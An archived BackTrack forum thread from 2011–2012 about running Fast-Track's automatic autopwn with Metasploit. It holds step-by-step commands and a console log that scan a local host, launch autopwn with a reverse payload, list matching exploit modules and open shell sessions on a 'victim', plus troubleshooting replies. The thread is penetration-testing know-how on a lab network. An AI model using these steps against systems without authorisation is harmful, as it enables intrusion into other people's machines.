PDA

View Full Version : BT5_fast-track_automatic_autopwn



zimmaro
07-18-2011, 06:24 AM
hi, guys
my "new" "video" comes from trying to run the function automatic_autopwn in FAST-TRACK.Iíve problems with sqlite3 databases (not aviable in my Metasploit) I'm allowed to edit the file that is[ autopwn.py] in the directory / pentest / exploits / fasttrack / bin / ftsrc, inserting the "parameters" of the postgresql database (supported). I know that this video is good for almost nothing! but at least I can use the button "2" after. / fast-track.py-I :)
Sorry for my English! Sorry for video quality :)
if you want to see: http://vimeo.com/26552328

I attach my file autopwn.py (for the configuration of postgresql in BT5 follow the tutorials in the forum)! many thanks bye!

tempuser
07-28-2011, 06:17 PM
Hey cool video, love the commentary haha
Cool pic too =D

zimmaro
08-05-2011, 07:37 AM
hi guys,
with msf 4.0.... the command db_workspace "don't work" but should be replace with only msf>workspace -d (delete) msf>workspace -a (add) eccc...
bye :)

maxfx
08-05-2011, 11:32 PM
Good video but have to say the best part was the goat lol :)

zimmaro
08-18-2011, 05:07 AM
http://www.backtrack-linux.org/forums/backtrack-5-videos/43117-bt5_fast-track_automatic_autopwn.html

nooh43
08-18-2011, 05:36 AM
Hi ..

please .. if you can write all Terminal Code ..

thank you .. :o

zimmaro
08-21-2011, 09:49 AM
hi
-changed your metasploit-path in fasttrack_config /pentest/exploits/fasttrack/config [if you are update&upgrade metasploit frammework]
-download MY_autopwn.py.doc in your desktop
-rename autopwn.py
-open autopwn.py (with your txt editor[gedit,kate,kwrite,.....]
-correct db_workspace -d in only workspace -d ecc,ecc [this for new framework version]
-correct db_workspace -a in only workspace -a eccc,ecc
-save & REPLACE this file to the ORIGINAL in /pentest/exploits/fasttrack/bin/ftsrc
-nmap -sP -T4 192.168.1.0/24 (scanning my network with nmap options(nmap --help)
-update-alternative --config ruby set "0"
-ruby --version 1.8.7 (for fasttrack to work in my bt5)
-cd /pentest/exploits/fasttrack
-./fast-track.py -i
-2 autopwn automatic
-set the victim ip (result of scanning-nmap) my victim is VULNS
-when finished if you have sessions:
sessions -l (list of open victim sessions)
sessions -i 1 (interaction of session number ......)
:)bye..........I seem to have written it all ... or at least I hope! :)

tonytue
08-22-2011, 10:57 AM
..........I seem to have written it all ... or at least I hope! :)

thanks for your contribution :)

ozyblackshark
08-23-2011, 09:38 AM
do you record it and the video format is .ogv? how to convert it into .avi?
i've tried using ffmpeg and the output is going to worse

zimmaro
08-23-2011, 04:13 PM
hi,
>>>>>apt-get install mencoder
>>>>> mencoder -idx name_of_your_file.ogv -ovc lavc -oac mp3lame -o name_of_your_file.avi
bye!:)

ozyblackshark
08-25-2011, 07:18 AM
@zimmaro:

thank's,, i will try it ASAP, but now i need to buy modem -____-a

hey, were i can contact you if i get another problem?
thank's

zimmaro
09-18-2011, 01:17 PM
hi,
in bt5r1 ,after update fast-track (v.4.02) the autopwn RETURN TO WORK using database postgresql!!!!!!now DELETE MY WAY!!
regards :)

zarbam
09-28-2011, 09:39 PM
after remapping all of the programs i realized you attached a modified version:D

xsixsi
10-10-2011, 07:47 PM
Good video I appreciate it thanks for the good share bro,

eastman47
10-16-2011, 08:39 AM
i did everything taht was told and now i get those errors


-] Unknown command: /etc/init.d/postgresql-8.4.
msf > db_driver postgresql
[-] Invalid driver specified
msf > db_connect root:toor@127.0.0.1:5432/metasploit
[-] No database driver has been specified
msf > workspace -d MyProject
[-] Database not connected
msf > workspace -a MyProject
[-] Database not connected
msf > db_nmap -sV -sS -O -T4 85.11.173.163
[-] Database not connected
msf > db_autopwn -p -x -e -R great -r
[-] Database not connected

zimmaro
10-16-2011, 11:45 AM
hi,eastman47,
have you look many replyes in this thread?the "tutorial is for bt5" in bt5 r1 (update&upgrade)database postgresql return to work into ORIGINAL fast-track!:)

root@bt:~# date
Sun Oct 16 13:38:54 CEST 2011
root@bt:~# uname -r
2.6.39.4
root@bt:~# cd /pentest/exploits/fasttrack
root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i
[---] [---]
[---] Fast Track: A new beginning [---]
[---] Written by: David Kennedy (ReL1K) [---]
[---] Lead Developer: Joey Furr (j0fer) [---]
[---] Version: 4.0.1 [---]
[---] Homepage: http://www.secmaniac.com [---]
[---] [---]


Fast-Track Main Menu:

1. Fast-Track Updates
2. Autopwn Automation
3. Nmap Scripting Engine
4. Microsoft SQL Tools
5. Mass Client-Side Attack
6. Exploits
7. Binary to Hex Payload Converter
8. Payload Generator
9. Fast-Track Tutorials
10. Fast-Track Changelog
11. Fast-Track Credits
12. Exit Fast-Track

Enter the number: 2
Metasploit Autopwn Automation:

http://www.metasploit.com

This tool specifically piggy backs some commands from the Metasploit
Framework and does not modify the Metasploit Framework in any way. This
is simply to automate some tasks from the autopwn feature already developed
by the Metasploit crew.

Simple, enter the IP ranges like you would in NMap i.e. 192.168.1.-254
or 192.168.1.1/24 or whatever you want and it'll run against those hosts.
Additionally you can place NMAP commands within the autopwn ip ranges bar,
for example, if you want to scan even if a host "appears down" just do
-PN 192.168.1.1-254 or whatever...you can use all NMap syntaxes in the
Autopwn IP Ranges portion.

When it has completed exploiting simply type this:

sessions -l (lists the shells spawned)
sessions -i <id> (jumps you into the sessions)

Example 1: -PN 192.168.1.1
Example 2: 192.168.1.1-254
Example 3: -P0 -v -A 192.168.1.1
Example 4: 192.168.1.1/24

Enter the IP ranges to autopwn or (q)uit FastTrack: 192.168.1.253

Do you want to do a bind or reverse payload?

Bind = direct connection to the server
Reverse = connection originates from server

1. Bind
2. Reverse

Enter number: 2
Launching MSFConsole and prepping autopwn...
db_driver postgresql
db_nmap 192.168.1.253
db_autopwn -p -t -e -r
sleep 5
jobs -K




sessions -l
echo "If it states No sessions, then you were unsuccessful. Simply type sessions -i <id> to jump into a shell"
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%
%% % %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%
%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%


=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 743 exploits - 382 auxiliary - 88 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
=[ svn r13874 updated 5 days ago (2011.10.11)

msf > db_driver postgresql
Using database driver postgresql
msf > db_nmap 192.168.1.253
Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2011-10-16 13:44 CEST
Nmap: Nmap scan report for ---.homenet.telecomitalia.it (192.168.1.253)
Nmap: Host is up (0.0017s latency).
Nmap: Not shown: 992 filtered ports
Nmap: PORT STATE SERVICE
Nmap: 135/tcp open msrpc
Nmap: 139/tcp open netbios-ssn
Nmap: 445/tcp open microsoft-ds
Nmap: 554/tcp open rtsp
Nmap: 2869/tcp open icslap
Nmap: 5357/tcp open wsdapi
Nmap: 10243/tcp open unknown
Nmap: 49155/tcp open unknown
Nmap: MAC Address: 00:0C:6E:B0:19:30 (Asustek Computer)
Nmap: Nmap done: 1 IP address (1 host up) scanned in 12.92 seconds
msf > db_autopwn -p -t -e -r
[-]
[-] Warning: The db_autopwn command is deprecated and will be removed in a future version.
[-] This code is not well maintained, crashes systems, and crashes itself.
[-]
Analysis completed in 28 seconds (0 vulns / 0 refs)

================================================== ==============================
Matching Exploit Modules
================================================== ==============================
192.168.1.253:135 exploit/windows/dcerpc/ms03_026_dcom (port match)
192.168.1.253:139 exploit/freebsd/samba/trans2open (port match)
192.168.1.253:139 exploit/linux/samba/chain_reply (port match)
192.168.1.253:139 exploit/linux/samba/lsa_transnames_heap (port match)
192.168.1.253:139 exploit/linux/samba/trans2open (port match)
192.168.1.253:139 exploit/multi/samba/nttrans (port match)
192.168.1.253:139 exploit/multi/samba/usermap_script (port match)
192.168.1.253:139 exploit/netware/smb/lsass_cifs (port match)
192.168.1.253:139 exploit/osx/samba/lsa_transnames_heap (port match)
192.168.1.253:139 exploit/solaris/samba/trans2open (port match)
192.168.1.253:139 exploit/windows/brightstor/ca_arcserve_342 (port match)
192.168.1.253:139 exploit/windows/brightstor/etrust_itm_alert (port match)
192.168.1.253:139 exploit/windows/smb/ms03_049_netapi (port match)
192.168.1.253:139 exploit/windows/smb/ms04_011_lsass (port match)
192.168.1.253:139 exploit/windows/smb/ms04_031_netdde (port match)
192.168.1.253:139 exploit/windows/smb/ms05_039_pnp (port match)
192.168.1.253:139 exploit/windows/smb/ms06_040_netapi (port match)
192.168.1.253:139 exploit/windows/smb/ms06_066_nwapi (port match)
192.168.1.253:139 exploit/windows/smb/ms06_066_nwwks (port match)
192.168.1.253:139 exploit/windows/smb/ms06_070_wkssvc (port match)
192.168.1.253:139 exploit/windows/smb/ms07_029_msdns_zonename (port match)
192.168.1.253:139 exploit/windows/smb/ms08_067_netapi (port match)
192.168.1.253:139 exploit/windows/smb/ms10_061_spoolss (port match)
192.168.1.253:139 exploit/windows/smb/netidentity_xtierrpcpipe (port match)
192.168.1.253:139 exploit/windows/smb/psexec (port match)
192.168.1.253:139 exploit/windows/smb/timbuktu_plughntcommand_bof (port match)
192.168.1.253:445 exploit/freebsd/samba/trans2open (port match)
192.168.1.253:445 exploit/lin............................................... .................................................. .....
..............happy continuos!!!:)

beybala
11-12-2011, 04:05 PM
hi, I uptaded Metasploit and then I cound't use autopwn , logs here :

msf > db_autopwn -h
[-] Unknown command: db_autopwn.
msf > help
Database Backend Commands
=========================

Command Description
------- -----------
creds List all credentials in the database
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_driver Specify a database driver
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces

what can I do?

zimmaro
11-13-2011, 05:33 PM
hi,beybala:
i'm trying to ask someone more knowledgeable than me:
http://www.backtrack-linux.org/forums/showthread.php?t=46338&p=209968#post209968

zimmaro
11-13-2011, 05:33 PM
hi,beybala:
i'm trying to ask someone more knowledgeable than me:
http://www.backtrack-linux.org/forums/showthread.php?t=46338&p=209968#post209968

tlotr
11-01-2012, 08:47 AM
Hi,

I have tried this. But unfortunately it isnt working for me. I am using backtrack 5 R3 Gnome.

Can any one please help me.

I have a system on the network which is having only port 5357 open wsdapi.

Anyone can help in suggesting a exploit for this port.

Thanks in advance.

zimmaro
11-02-2012, 02:37 AM
Hi,

I have tried this. But unfortunately it isnt working for me. I am using backtrack 5 R3 Gnome.

Can any one please help me.

I have a system on the network which is having only port 5357 open wsdapi.

Anyone can help in suggesting a exploit for this port.

Thanks in advance.

hi :)
the thread had been tested for the first versions of BT5, now I could not tell if it works with R3.
I state not to be an expert, if your victim is "patched" to exploit "" launched by autopwn "" "with this technique you can not do anything!.
if the scanner you are getting the door open 5357 (WSDAPI) do a search for "specification" of the potential vulnerability and ... try it ..!
or you have to change "the-way" of "" attack ""
bye